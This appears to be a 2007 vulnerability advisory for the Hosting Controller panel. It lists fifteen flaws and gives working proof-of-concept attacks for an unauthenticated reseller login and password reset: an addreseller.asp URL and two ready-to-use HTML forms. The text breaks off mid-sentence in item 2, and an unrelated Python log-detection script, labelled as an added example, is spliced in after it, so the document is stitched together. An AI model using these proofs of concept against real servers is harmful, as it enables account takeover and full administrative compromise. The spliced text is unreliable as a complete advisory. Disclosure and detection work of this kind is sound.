hc-multi.txt
Posted on 14 December 2007
Title: Multiple Security Bugs In Hosting Controller
Critical: Extremely critical
Impact: Full system administrator access
Vendor: Hosting Controller
Version: 6.1 Hot fix <= 3.3
Vendor URL: www.hostingcontroller.com
Solution: N/A from company - there is a temporary solution in this report
Exploit: Available
Release Date: 2007 - December
Credit: www.BugReport.ir

####################
- Discussion:
####################

1- [Remote Attacker] can log in to the Hosting Controller panel. He can also change all other users' passwords.
2- [User] can copy a file to the Hosting Controller web directory, where it is executed with administrative privilege, so the attacker can execute his commands with administrative privilege. For example, an attacker can gain a remote desktop on the server using this bug and uploading an ASP file!
3- [Remote Attacker] can create a new user.
4- [Remote Attacker] can change all users' profiles.
5- [User] can see all the database information via SQL injection.
6- [User] can change his credit amount or increase his discount.
7- [User] can uninstall others' FrontPage extensions.
8- [User] can delete all gateway information.
9- [User] can enable or disable pay types.
10- [User] can see all usernames on the server via "fp2000/NEWSRVR.asp".
11- [User] can find the Hosting Controller setup directory.
12- [User] can import an unwanted plan or change the plans.
13- [Remote Attacker] can find the web site path.
14- [Remote Attacker] can enable or disable all Hosting Controller forums by SQL injection.
15- [User] can change others' host headers.

[Remote Attacker] = (Unauthorized user without any permission or access.)
[User] = (A user with a simple account.)

####################
- Exploits: (or POCs)
####################

\\\\\\\\\\\\////////////////////

1- [Remote Attacker] can log in to the Hosting Controller panel. He can also change all other users' passwords:

1.1- http://[HC URL]/hosting/addreseller.asp?reseller=[USERNAME] -> for ex.
[USERNAME]= resadmin

1.2- Now, to log in without changing the password, the attacker must run "ChangeDisplay.htm" and is then redirected to "main.asp".

~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
    _action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1'
    frmDisplay.action = window.document.all.URL.value + _action
    return true;
}
</script>
URL: <input type="text" name="URL" />
<form name="frmDisplay" action="" method="post" onsubmit="return check()">
<input type="hidden" name="TemplateSkin" value="PanelXP/Blue" />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.3- The attacker can also change a username's password without knowing the current password, via "ChangePass.htm":

~~~~~~~~~~~~~~~~1.3.1 ChangePass.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
    _action = '/Accounts/AccountActions.asp?ActionType=UpdateUser'
    frmChangePass.action = window.document.all.URL.value + _action
    return true;
}
</script>
URL: <input type="text" name="URL" /><br />
<form name="frmChangePass" action="" method="post" onsubmit="return check()">
UserName: <input type="text" name="UserName" value="[USERNAME]" /> <br />
FullName: <input type="text" name="FullName" value="[USERNAME]" /> <br />
Description: <input type="text" name="Description" value="Something" /> <br />
Password: <input type="text" name="Pass1" value="" /> <br />
Confirm Password: <input type="text" name="ConfPass" value="" /> <br />
<input type="hidden" name="DefaultDiscount" value="0" />
<input type="hidden" name="CreditLimit" value="0" />
<input type="hidden" name="ActionType" value="AddUser" />
<input type="hidden" name="PassCheck" value="TRUE" />
<input type="submit" />
</form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

\\\\\\\\\\\\////////////////////

2- [User] can copy a file to the Hosting Controller web directory, where it is executed with administrator's privilege, so the attacker can execute his commands with administrator's privilege.
For example, the attacker can gain a remote desktop on the server this way, by uploading an ASP file! This bug exists because "inc_newuser.asp" can set Full Control permission on each "db", "www", "Special", or "log" directory on the server. This part is more complicated than the others, so we describe it in more detail.

2.1- We have a username, for ex.
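As an added detection example (not part of this advisory or of Hosting Controller): a script that flags the item-1 chain in IIS W3C logs, i.e. a client requesting addreseller.asp?reseller=... and then, within a short window, displays.asp (1.2) or AccountActions.asp (1.3). The log lines are constructed, the ten-minute window is an assumption, and the paths assume the panel is served from the site root.

```python
from datetime import datetime, timedelta

# Endpoints named in item 1 of the advisory (lower-cased for comparison; paths
# assume the panel is served from the site root).
ENTRY = "/hosting/addreseller.asp"                 # 1.1: ?reseller=[USERNAME]
FOLLOWUPS = {"/adminsettings/displays.asp",        # 1.2: ChangeSkin=1, then main.asp
             "/accounts/accountactions.asp"}       # 1.3: ActionType=UpdateUser
WINDOW = timedelta(minutes=10)                     # assumed pairing window

def parse_w3c(text):
    """Yield one dict per log row, using the #Fields: header to name the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_impersonation_chains(text):
    """Return [(client_ip, reseller, follow_up_stem)] for every follow-up request
    a client made within WINDOW of its own addreseller.asp?reseller=... hit."""
    last_entry = {}   # client ip -> (timestamp, reseller name requested)
    hits = []
    for row in parse_w3c(text):
        ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        stem, query, ip = row["cs-uri-stem"].lower(), row["cs-uri-query"], row["c-ip"]
        if stem == ENTRY:
            params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
            if "reseller" in params:
                last_entry[ip] = (ts, params["reseller"])
        elif stem in FOLLOWUPS and ip in last_entry:
            t0, reseller = last_entry[ip]
            if ts - t0 <= WINDOW:
                hits.append((ip, reseller, stem))
    return hits

# Constructed IIS 6 W3C log excerpt: one client runs the 1.1 -> 1.2 -> 1.3 chain, another is a normal session.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2007-12-14 10:01:02 10.0.0.5 GET /hosting/addreseller.asp reseller=resadmin 80 - 192.0.2.10 Mozilla/4.0 200
2007-12-14 10:01:40 10.0.0.5 POST /AdminSettings/displays.asp DecideAction=1&ChangeSkin=1 80 - 192.0.2.10 Mozilla/4.0 302
2007-12-14 10:02:15 10.0.0.5 POST /Accounts/AccountActions.asp ActionType=UpdateUser 80 - 192.0.2.10 Mozilla/4.0 200
2007-12-14 10:30:00 10.0.0.5 GET /hosting/main.asp - 80 resadmin 198.51.100.7 Mozilla/4.0 200
"""

if __name__ == "__main__":
    for ip, reseller, stem in find_impersonation_chains(SAMPLE_LOG):
        print(f"ALERT {ip}: addreseller.asp?reseller={reseller} followed by {stem}")
```

A hit on the follow-up endpoints with no prior authenticated session for that client is the signal; the ordinary request from the second client produces nothing.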